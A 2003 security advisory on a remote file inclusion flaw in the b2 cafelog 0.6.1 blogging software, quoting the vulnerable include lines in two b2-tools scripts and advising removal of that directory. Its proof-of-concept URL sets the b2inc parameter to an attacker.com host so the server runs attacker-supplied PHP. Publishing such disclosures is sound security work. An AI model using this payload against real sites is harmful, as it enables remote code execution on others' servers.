|
Products: b2 cafelog 0.6.1 (http://cafelog.com/) Date: 29 May 2003 Author: pokleyzz <pokleyzz_at_scan-associates.net> Contributors: sk_at_scan-associates.net shaharil_at_scan-associates.net munir_at_scan-associates.net URL: http://www.scan-associates.net Summary: b2 cafelog 0.6.1 remote command execution. Description =========== b2 cafelog is blogger system written in php with mysql ad database backend. Details ======= b2 cafelog 0.6.1 come with directory b2-tools. This directory contain 2 php scripts (blogger-2-b2.php and gm-2-b2.php) which allow user to specify $b2inc and do remote code injection. from blogger-2-b2.php line 21 ----------------------------------------------------- case "step1": include("b2config.php"); include("$b2inc/b2functions.php"); include("$b2inc/b2vars.php"); ------------------------------------------------------------------------------------ from gm-2-b2.php line 5 ---------------------------------------------------------- // 3. load in the browser from there include("b2config.php"); include($b2inc."/b2functions.php"); ----------------------------------------------------------------------------------- Proof of concept =========== http://blabla.com/b2-tools/gm-2-b2.php?b2inc=http://attacker.com attacker.com have file named b2functions.php with php script you want to execute. Workaround ========= Remove b2-tools directory. Vendor Response =============== Vendor has been contacted on 19/05/2003 but to reply given.